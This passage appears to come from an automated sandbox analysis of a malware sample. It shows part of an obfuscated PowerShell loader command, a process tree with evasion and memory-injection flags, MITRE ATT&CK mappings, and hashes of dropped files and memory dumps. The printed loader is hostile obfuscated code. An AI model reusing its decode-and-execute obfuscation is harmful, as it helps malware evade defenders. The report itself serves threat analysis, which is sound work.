aymSupemBoareBeretAleb Eksp=Folk BrdfGGal eEvant etc-ToccCIrr.oRebrnFre.t De.e iscnNovetBrut npl$S mmITil nFil c eiaOpsppS aua Frec PoliSk ktSamna.ountEmuseGuam ');Selvtugten (godkendelsesbefjelsernes 'Acep$DravgWel,lArano,nslbsocia.artlDish:al.oTSqexaForsaDe flSkilbLia o CebnFemid ,ap d sh=mani Idi[ S lSPredyUnswsmanntCouneIndfmTri .A ioCFratoP.isnPrervun neSacrrMalmtTakk]Alts: Scr:SrilF YtrrTrbeo G amProgB De aStapsn koe ndv6Blod4TylsSIsist SekrSnesiReo,nFo.egSvir(Nedl$ B rM Lino .pod,inkeArm mxenepAnthrld loverdg LaerFoggaSstem Slkm Ca e mist mpe)epid ');Selvtugten (godkendelsesbefjelsernes ' Ers$Sacrg S.llS orosn kbLa aabruglFi,f:pe lhfygei SatjUndeaAabncPlurkbilae ekar.istnGenieS,rrsNati Unde=Mult Fo s[TranSUnhoyFir sSaddtMiche Funmskro.HoloTSikke R sxSulftSarc.BjerEF rrnM.tacRobboUlmed UroiObj,n eftgTota]Tes,:Koll:Fo,lAOrolSKompCAmphIProgIMyo .KontGDocie Undt CenSpreat Phir Stri Godn StagMini(Smda$D meToplaahvira MinlSalabSlyno U,gnPjatdQuin)Spar ');Selvtugten (godkendelsesbefjelsernes 'Do.i$ hotgBeedlAry oFloubp rpa kitlEnde: Un N prjoStjenFjo.cUncioSa.anFlaacRogue ProsTyphsHijii riv BogePriv1.ndu7Skaa7fu i=Sk,p$ Ti,hFarciBo.djKirka M,pc rgkNonseanotrTegnnSeleeAut sElev. C ns Genu Hj.bReprsMisptOutsrE aeiUdr n.oilgDepe( Dun$TituMAlauo .venExcrkSociiCil.sP ech.leal ndpySyst,Dybv$Pl.dBGenie Ti,sF sskPrisnPr.nk,ikme UnpnUho dOpsteemits urg)D.ss ');Selvtugten $Nonconcessive177;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      System Time Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2684
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Separatisme.Cou && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2212

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

System Time Discovery

1

T1124

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabAF54.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KXFBGKL13H74F6PXPBMD.temp

Filesize
7KB

MD5
5218d094c5dbc4a2f2cf83e2041f3268

SHA1
9f157ff67df91ebd3acedaaff2244fd96f089a2b

SHA256
bb7b238489c8fc45f69c4d12f17d7f4f5f9c73e830af010ae32181cc52cdbf92

SHA512
d17a0183c639069328a778a729bd2d19e94740649ead0b9eeea2e4e0c2e029409fbdd14f3f7cbf497fcbfec5c1095026cb82995264c6f7f986f1b6436d1dd394

Download Submit
C:\Users\Admin\AppData\Roaming\Separatisme.Cou

Filesize
403KB

MD5
030a6f6849b60c1b6dda2867d97bf99c

SHA1
f7879cbed1fd28d8110e6d4fb1a0437a9c541428

SHA256
6cb8fc9218ae33c2fb8a2194d38e4ceb22ea7f96444e81e1478d0d82db379423

SHA512
feeead829619beb404fd815ff39b8388a66ce2e6671bb281a157ebb7201caf4b2e30a6bf3d0d2a887f1378e08a5eed30c45cde22ce4f950c3972862e64bbcbd8

Download Submit
memory/2012-25-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

Filesize
9.6MB

Download
memory/2012-21-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download
memory/2012-24-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

Filesize
9.6MB

Download
memory/2012-22-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

Filesize
9.6MB

Download
memory/2012-26-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

Filesize
9.6MB

Download
memory/2012-27-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

Filesize
9.6MB

Download
memory/2012-28-0x000007FEF625E000-0x000007FEF625F000-memory.dmp

Filesize
4KB

Download
memory/2012-30-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

Filesize
9.6MB

Download
memory/2012-31-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

Filesize
9.6MB

Download
memory/2012-23-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

Filesize
32KB

Download
memory/2012-20-0x000007FEF625E000-0x000007FEF625F000-memory.dmp

Filesize
4KB

Download
memory/2684-36-0x0000000006670000-0x0000000009C1C000-memory.dmp

Filesize
53.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads